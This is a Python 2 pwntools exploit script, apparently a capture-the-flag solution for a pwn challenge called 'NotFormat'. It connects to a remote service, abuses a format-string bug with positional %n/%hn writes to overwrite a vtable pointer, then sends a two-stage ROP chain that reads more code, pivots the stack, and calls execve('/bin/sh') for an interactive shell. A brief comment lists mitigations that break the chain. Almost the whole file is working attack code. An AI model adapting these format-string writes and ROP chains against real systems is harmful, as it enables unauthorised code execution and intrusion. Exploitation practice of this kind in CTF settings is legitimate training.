#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit script for the "NotFormat" pwn challenge.  Python 2 only: the str
# payload and the bytes returned by p64() are concatenated directly, which
# Python 3 rejects.
#
# Stage 1 abuses a printf-style format string with positional %n / %hn
# conversions: the number of characters printed before each conversion is
# stored through the pointer found at that argument position, so whoever
# controls the format string controls both value and destination.  The three
# pointers appended at offset 232 below are the write targets; the character
# counts in the format string are derived from `gadget` and
# `fake_vtable_addr` (arithmetic spelled out at the format string).
# Stage 2 is a short ROP chain that reads a second chain into writable
# memory, pivots the stack onto it with `leave`, and issues execve("/bin/sh").
#
# Defensive note: the chain relies on the location named vtable_addr being
# writable at runtime and on every address below being absolute.  A
# read-only relocation section (full RELRO), PIE/ASLR, FORTIFY_SOURCE's %n
# checks, or simply never passing user input as a format string each break
# one link of it.
from pwn import *
# pwntools supplies ELF, remote, process, p64 and context used below.
context(arch='amd64', os='linux', log_level='info')  # p64() packs 64-bit little-endian words
elf = ELF('./NotFormat')  # challenge binary, loaded from the working directory
libc = elf.libc  # resolved but not referenced anywhere below
# Absolute addresses taken from the target binary (presumably non-PIE --
# confirm against the binary).  The pr*r names suggest `pop <reg>; ret`
# gadgets; `leave` and `syscall` are presumably `leave; ret` and a syscall
# gadget.  Verify each against a disassembly before reuse.
fake_vtable_addr = 0x06CE400  # writable region: fake vtable, then the stage-2 buffer at +0x80
vtable_addr = 0x6cb3d8        # location whose contents are overwritten with fake_vtable_addr (write 3)
gadget = 0x43f17d             # not referenced directly: its halves 0xF17D / 0x0043 are the
                              # first two %hn values in the format string below
prdir = 0x4005d5   # pop rdi; ret  (by name)
praxr = 0x04c2358  # pop rax; ret  (by name)
prsir = 0x4017f7   # pop rsi; ret  (by name)
prdxr = 0x442c47   # pop rdx; ret  (by name)
leave = 0x400b68   # leave; ret    (by name) -- used for the stack pivot
syscall = 0x4683d6 # syscall gadget
# io = process(elf.path)  # local run against ./NotFormat
io = remote('123.59.71.3', 20020)  # challenge service
# ---- stage 1: format-string writes + first ROP chain ----------------------
p = ''
# Positional writes.  Characters printed before each conversion, cumulative:
#   %61821c   -> 61821                = 0xF17D   -> %35$hn  (low half of `gadget`)
#   %3782c    -> 65603, low 16 bits   = 0x0043   -> %36$hn  (high half of `gadget`)
#   %7070653c -> 7136256              = 0x6CE400 -> %37$n   (= fake_vtable_addr)
# so arguments 35..37 must hold the three target pointers appended at
# offset 232 below.  Which stack slots those are is a property of the
# target's frame layout -- re-derive it if the binary changes.
p += '%61821c%35$hn%3782c%36$hn%7070653c%37$n'
p = p.ljust(112-40)  # pad to 72 bytes so the saved-register slots below line up
p += '00000000' # rbx (filler)
p += p64(fake_vtable_addr+0x80) # rbp: `leave` below turns this into the new rsp (pivot target)
p += '11111111' # r12 (filler)
p += '00000000' # r13 (filler)
p += '00000000' # r14 (filler)
p += p64(prsir) # rip: first gadget of the chain
p += p64(fake_vtable_addr+0x80)  # rsi = buffer that stage 2 is read into
p += p64(prdxr)
p += p64(0x100)  # rdx = 0x100, maximum read length
p += p64(prdir)
p += p64(0)      # rdi = 0 (stdin)
p += p64(praxr)
p += p64(0)      # rax = 0 -> SYS_read on x86-64
p += p64(syscall)  # read(0, fake_vtable_addr+0x80, 0x100)
p += p64(leave)    # rsp <- rbp (= fake_vtable_addr+0x80); pop rbp; ret continues in the buffer just read
assert len(p) <= 232  # the three pointers below must land exactly at offset 232
p = p.ljust(232)
# Targets of the three format-string writes, in argument order 35, 36, 37.
p += p64(fake_vtable_addr+0x38)    # receives the low 16 bits of `gadget`
p += p64(fake_vtable_addr+0x38+2)  # receives the high 16 bits of `gadget`
p += p64(vtable_addr)              # receives fake_vtable_addr (4-byte %n)
io.send(p)
# ---- stage 2: execve chain, read into fake_vtable_addr+0x80 ---------------
rop = ''
rop += 'aaaaaaaa'  # consumed by the `pop rbp` inside `leave`
rop += p64(praxr)
rop += p64(59)     # rax = 59 -> SYS_execve on x86-64
rop += p64(prdir)
rop += p64(fake_vtable_addr+0x80+0x60)  # rdi = address of "/bin/sh" at offset 0x60 of this buffer
rop += p64(prsir)
rop += p64(0)      # rsi = NULL argv
rop += p64(prdxr)
rop += p64(0)      # rdx = NULL envp
rop += p64(syscall)  # execve("/bin/sh", NULL, NULL)
rop = rop.ljust(0x60)
rop += '/bin/sh\x00'
rop += '\x00'*12   # total 0x74 bytes, within the 0x100-byte read above
io.send(rop)
io.interactive()